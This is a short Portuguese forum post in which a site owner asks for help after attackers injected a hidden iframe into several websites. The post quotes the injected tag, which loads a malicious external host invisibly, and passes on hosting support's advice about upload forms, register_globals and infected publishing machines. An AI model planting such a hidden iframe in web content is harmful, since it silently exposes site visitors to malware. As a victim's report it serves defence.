Invasão

Estou com um problema sério.

Alguém tem entrado em alguns sites e colocado uma IFRAME com src para um site externo malicioso. Vejam o exemplo abaixo:

<iframe src="http://thefilmmusic.cn:8080/ts/in.cgi?pepsi16" width=12 height=12 style="visibility: hidden"></iframe>

Não sei ainda qual pode ser a falha de segurança. Segundo contato do suporte:

"Nesses casos recomendamos que sejam verificados os scripts que permitem upload para o servidor (normalmente formulários de contato), que não seja utilizado o "Register_globals" do PHP pois, se mal utilizado, pode ser inseguro, e que os computadores que são utilizados para publicar conteúdos sejam verificados quanto a existência de vírus. "

Um dos sites que colocaram o código malicioso é esse: http://www.rbsm.com.br/

Obrigado!